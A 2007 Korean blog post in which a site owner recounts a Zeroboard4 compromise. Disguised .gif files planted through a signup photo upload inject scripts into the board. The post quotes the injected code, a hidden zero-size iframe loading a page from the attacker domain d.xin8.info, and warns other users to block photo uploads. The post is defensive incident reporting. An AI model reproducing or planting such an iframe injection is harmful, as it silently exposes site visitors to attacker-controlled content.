나를 아주 놀래킨 http://d.xin8.info/daipi/css.htm

2007. 11. 1. 18:42 [ 기억 저편의 것들/미분류 ] 모바일 버전으로 보기
d.xin8.info/daipi/css.htm  (☜ 주소창에 쳐보시면 절대 안됩니다.)

어찌나 놀라고 당황했던지, 홈페이지를 폐쇄해야 하는거 아닌가 고민했었습니다.
지금은 어느정도 진정된 가슴을 쓸어내리며,
오늘 제가 겪은 『제로보드4 원격 실행 보안 취약점』의 생생한 경험을 포스팅합니다.

d.xin8.info 에 관련된 검색결과를 여기저기 뒤져서 알게된 정보들 중 유용한 링크들을 열거해보았습니다.
정보를 제공해주신 모든분들께 진심으로 감사드립니다..(그대들이 없었으면 어쩔뻔했어;;)



대충 요약을 해보건데,
제로보드 회원가입시 사진파일 업로드를 통해서,(혹은 보안패치가 안된 하위버전의 write_ok.php 업로드를 통해서) 그리고 lib.php 파일을 거쳐서(?)
제로보드의 icon 폴더에 include.gif 혹은
제로보드의 images 폴더에 admin_info.gif 파일을 만들고,
이 파일들은 이미지 파일을 가장해서, 소스내에
document.write("<iframe width='0' height='0' src='http://d.xin8.info/daipi/css.htm'></iframe>");
를 심어놓습니다.
그리고 _head.php 최하단에 자바스크립트 실행문을 넣습니다.

말그대로 원격/실행/보안/취약점.


아래의 캡춰이미지는 제가 떨리는 가슴을 진정시키며, 침착하게 대응했던 내용입니다. -_-;
꺼져닷컴을 방문해주시는, 그리고 꺼져스킨을 사용해주신 분들중
저와같은 피해를 당하지 않으셨으면 하는 마음에 포스팅합니다.
(여러분! 회원가입폼에서 사진업로드를 당분간 막읍시다.)







Write a comment